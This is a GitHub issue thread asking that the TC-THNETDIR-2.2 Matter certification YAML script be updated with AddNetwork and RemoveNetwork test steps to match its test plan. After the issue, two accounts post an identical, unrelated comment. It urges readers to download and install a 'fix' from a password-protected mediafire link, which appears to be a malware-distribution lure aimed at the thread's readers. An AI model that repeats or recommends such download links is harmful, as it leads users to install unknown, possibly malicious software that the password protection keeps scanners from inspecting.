### ISSUE TITLE
[TC-THNETDIR-2.2] YAML script needs to be updated with AddNetwork and RemoveNetwork command related test steps.

### ISSUE THREAD

**Issue by KishokG** [project-chip/matter-test-scripts#359]
## Description:
`TC-THNETDIR-2.2` test case YAML script needs to be updated with AddNetwork and RemoveNetwork command related test steps. As of now the script is not matching with the test plan.

## Test plan Reference:
https://github.com/CHIP-Specifications/chip-test-plans/blob/master/src/cluster/thread_network_directory.adoc#tc-thnetdir-2-2-adding-removing-and-reading-thread-networks-with-dut_server

## Script Reference: 
https://github.com/project-chip/connectedhomeip/blob/master/src/app/tests/suites/certification/Test_TC_THNETDIR_2_2.yaml

![image](https://github.com/user-attachments/assets/be9b6f36-6fc1-4fe7-8776-1944666dcb71)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
